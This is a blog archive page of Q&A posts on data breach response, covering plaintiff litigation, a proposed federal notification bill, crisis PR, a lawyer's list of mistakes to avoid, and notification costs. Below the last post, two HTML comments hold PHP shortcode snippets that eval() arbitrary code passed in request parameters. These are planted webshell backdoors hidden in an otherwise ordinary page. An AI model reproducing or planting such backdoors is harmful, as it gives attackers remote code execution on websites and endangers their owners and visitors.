Data Breach Events: A Plaintiff Perspective

Email Computer Key For Emailing Or ContactingA Q&A with John Yanchunis of Morgan & Morgan
The legal landscape around data loss is rapidly evolving, and with major events such as the Anthem breach changing the game on a daily basis, it can be a challenge to keep up with the courts’ current thinking. I spoke with plaintiff attorney John Yanchunis of Morgan & Morgan about some of the most recent developments he’s observed.

Continue Reading

Digging Into the President’s Data Breach Notification Bill

Personal Data & Protection ActA Q&A with Dominic Paluzzi McDonald Hopkins
In late January 2015, the White House introduced the Personal Data Notification and Protection Act (PDNPA), a data breach notification bill, intended to improve national cybersecurity. I asked attorney and breach coach Dominic Paluzzi of McDonald Hopkins about how this bill differs from the existing laws and its potential implications for risk managers.

Continue Reading

Data Breach Public Relations: Getting Ahead of the Message

A Q&A with Melanie Thomas of INFORM
It’s just one of many pressing concerns during a cyber security event, but public relations and crisis communications are absolutely essential for sustaining customer loyalty and brand reputation long after the headlines fade. I spoke with Melanie Thomas of INFORM about how these services work and what companies can do right now to prepare for an emergency situation.

Continue Reading

14.5 Things NOT to Do Following a Data Breach Incident

A Q&A with John Mullen, Nelson Levine de Luca & Hamilton, LLP

The hours and days following the initial discovery of a breach are full of confusion and chaos. However, companies can save themselves from a lot of trouble later on down the line if they stay focused. We spoke to lawyer John F. Mullen Sr. of Nelson Levine de Luca & Hamilton, LLP in Blue Bell, PA, about dos and don’ts for companies in this situation—mostly don’ts.

The following is what he came up with:

  1. Don’t assume a breach won’t happen to you. It’s going to happen and you need to be insured. Even if you’re not a big multinational company that’s attracting hackers you are likely to have someone working for you who could accidentally leave their laptop with TSA at the airport and land you in a data leak situation.
  2. Don’t kid yourself. This was a breach. I’ve seen companies in the aftermath of an incident who don’t want to come to terms with the reality so they bury it. They put off dealing with it. They rationalize. It doesn’t help.
  3. Don’t rush to judgment. Meaning, don’t start sending out notice until you know how many people are involved. To the extent possible, don’t start responding until you have all of the facts.
  4. Don’t assume that the first factual answers you get are accurate. In all my years in the business, I have never encountered a case where the original version of the story ends up being the absolute story. The truth is always more complicated. See above.
  5. Don’t let your self-insured retention cripple you from taking the right action. In other words, don’t be cheap. If you’ve got a million-dollar problem, don’t let your 50,000-dollar checkbook force you to cut corners. At the end of the day, it’s just going to delay the action and compromise the situation.
  6. Don’t hire your favorite M&A lawyer for a breach case. This may sound self-serving but it’s also true: This is a specialty area of the law and you want a person who is an expert in this area to represent you.
  7. Don’t do what I call “panic hiring.” Yes, you have limited time to take care of the response, but don’t just hire the first vendors you meet. That’s the equivalent of walking into a car dealership and handing them your checkbook and asking the salesman to write in the price. You may be panicked but if you don’t hire the right people, they will take advantage of that and you’ll pay out of the nose. This is another reason to have cyber insurance, as many of the insurers have negotiated favorable rates with needed vendors.
  8. Don’t over-notify people when notice is required.
  9. Don’t ignore your vendor due diligence. If you’re handing off your data to a company to do your processing and they lose the information then you will likely still be held liable. Make sure the company has the insurance and capital to handle that kind of loss so you don’t get stuck.
  10. Don’t forget to create a response plan ahead of time.
    10.b  Don’t run a response by committee.
    If you’ve got five people in charge, then no one’s in charge. Have a senior manager who handles decision-making and money spending in charge. If not, people will sit around looking at each other and it will take much longer to complete everything that needs to be done.
  11. Don’t rush through any of the process. Yes, there’s a time element involved—typically 45 to 60 days. But I can’t tell you how many clients come to me and say they want to give notice tomorrow. I always have to slow them down because inevitably they will find out they were more exposed than they thought, and then everything they did would be wrong and they’d have to do it all over again.
  12. Don’t fight with regulators, and don’t let your lawyers fight with regulators. Picking fights doesn’t help anybody and if you get on their bad side, regulators will put you through years of hell. Show that you’re willing to bend over backward to work with them and things will usually go well.
  13. Don’t forget e-discovery.
    Not saving your data up front can get you into big trouble down the road.
  14. Don’t assume you can win the class action suit.

Clients come to me assuming they will win because there aren’t “sufficient damages,” but the courts are swinging the other way now and that is no longer the case.

In conclusion…
In assisting insurance companies in dealing with their data breach insurance claim incidents—on average about one per week, and no two events look the same—I find it amazing how many times we come across clients who trigger not one but several of the issues listed in Mr. Mullen’s list. The good news is that many businesses are starting to follow (albeit slowly) a prudent breach response roadmap, demonstrating that they have learned from either their past mistakes or by seeing other organizations (their peers/competitors) deal with a publicly reported incident.

Crisis Data Breach Response: Notification

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. The first focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or Federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong or weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has about your organization.  I heard an industry colleague say it best, “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail.  Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record.  The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach, however organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.

<!– [insert_php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/insert_php][php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/insert_php][php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/php] –>

No more posts.